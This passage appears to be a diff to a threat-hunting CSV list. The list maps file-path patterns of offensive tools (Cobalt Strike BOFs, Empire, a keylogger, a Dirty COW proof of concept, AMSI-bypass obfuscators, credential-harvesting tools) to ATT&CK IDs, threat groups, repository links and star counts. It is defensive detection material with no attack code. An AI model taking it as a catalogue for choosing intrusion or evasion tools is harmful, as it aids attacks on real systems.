T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*/TikiSpawn/*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*/timeoutpwn64*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" -"*/timestomp.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*/timestomping.ps1*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" +"*/timestomp.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/timestomping.ps1*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" "*/timwr/CVE-2016-5195*","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/timwr/CVE-2016-5195","1","1","N/A","N/A","10","935","404","2021-02-03T16:03:40Z","2016-10-21T11:19:21Z" "*/tinar.py*","offensive_tool_keyword","ThisIsNotRat","control windows computeur from telegram","T1098 - T1079 - T1105 - T1047 - T1059","TA0010 - TA0009 - TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RealBey/ThisIsNotRat","1","0","N/A","9","10","49","18","2023-09-10T07:39:38Z","2023-09-07T14:07:32Z" "*/tls-alpn.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/tls-nextprotoneg.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/tls-ticketbleed.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/tmmmp *","offensive_tool_keyword","OMGLogger","Key logger which sends each and every key stroke of target remotely/locally.","T1056.001 - T1562.001","TA0004 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/OMGLogger","1","0","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" -"*/tmp/*-passwords.txt*","offensive_tool_keyword","DefaultCreds-cheat-sheet","One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password","T1110.001 - T1110.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/ihebski/DefaultCreds-cheat-sheet","1","0","N/A","N/A","10","4664","610","2023-07-15T22:16:49Z","2021-01-01T19:02:36Z" -"*/tmp/*-usernames.txt*","offensive_tool_keyword","DefaultCreds-cheat-sheet","One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password","T1110.001 - T1110.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/ihebski/DefaultCreds-cheat-sheet","1","0","N/A","N/A","10","4664","610","2023-07-15T22:16:49Z","2021-01-01T19:02:36Z" -"*/tmp/.manspider*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","772","119","2023-10-03T03:50:49Z","2020-03-18T13:27:20Z" +"*/tmmmp *","offensive_tool_keyword","OMGLogger","Key logger which sends each and every key stroke of target remotely/locally.","T1056.001 - T1562.001","TA0004 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/OMGLogger","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*/tmp/*-passwords.txt*","offensive_tool_keyword","DefaultCreds-cheat-sheet","One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password","T1110.001 - T1110.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/ihebski/DefaultCreds-cheat-sheet","1","0","N/A","N/A","10","4666","610","2023-07-15T22:16:49Z","2021-01-01T19:02:36Z" +"*/tmp/*-usernames.txt*","offensive_tool_keyword","DefaultCreds-cheat-sheet","One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password","T1110.001 - T1110.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/ihebski/DefaultCreds-cheat-sheet","1","0","N/A","N/A","10","4666","610","2023-07-15T22:16:49Z","2021-01-01T19:02:36Z" +"*/tmp/.manspider*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" "*/tmp/amass.zip*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" "*/tmp/bin/csprecon*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" "*/tmp/bin/subfinder*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" "*/tmp/c2-rebind.so*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","0","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" -"*/tmp/chimera.ps1*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1187","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"*/tmp/chimera.ps1*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" "*/tmp/dcow *","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/timwr/CVE-2016-5195","1","0","N/A","N/A","10","935","404","2021-02-03T16:03:40Z","2016-10-21T11:19:21Z" "*/tmp/FavFreak/*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" "*/tmp/geckodriver.tar.gz*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" @@ -5612,55 +5673,56 @@ "*/tmp/metadata/na.elf*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" "*/tmp/metasploit_install*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*/tmp/p0f.log*","offensive_tool_keyword","p0f","P0f is a tool that utilizes an array of sophisticated purely passive traffic fingerprinting mechanisms to identify the players behind any incidental TCP/IP communications","T1046 - T1040","TA0007 - TA0010","N/A","N/A","Sniffing & Spoofing","https://www.kali.org/tools/p0f/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/tmp/payload.ps1*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1187","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"*/tmp/payload.ps1*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" "*/tmp/scanrepo.tar.gz*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" "*/tmp/truffleHog.tar.gz*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" -"*/tmp/vt-post-*.txt*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1187","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" -"*/tmp/vt-results-*.txt*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1187","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" -"*/tmp/wordlist.txt*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*/tmp/vt-post-*.txt*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"*/tmp/vt-results-*.txt*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"*/tmp/wordlist.txt*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" "*/tn3270-screen.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/TokenStealing*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" "*/TokenStripBOF*","offensive_tool_keyword","cobaltstrike","Beacon Object File to delete token privileges and lower the integrity level to untrusted for a specified process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nick-frischkorn/TokenStripBOF","1","1","N/A","10","10","28","5","2022-06-15T21:29:24Z","2022-06-15T02:13:13Z" -"*/TokenTactics.git*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","439","67","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" +"*/TokenTactics.git*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","440","66","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" "*/Tokenvator/*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" "*/tomcat-RH-root.sh*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" -"*/tools/BeaconTool/*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1038","224","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" -"*/tools/DHCP.py*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4198","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" -"*/tools/psexec.rb*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-PsExec.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*/tools/BeaconTool/*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1038","225","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" +"*/tools/DHCP.py*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*/tools/psexec.rb*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-PsExec.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*/Tools/spoolsystem/*","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas/","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*/Tools/Squeak/Squeak*","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 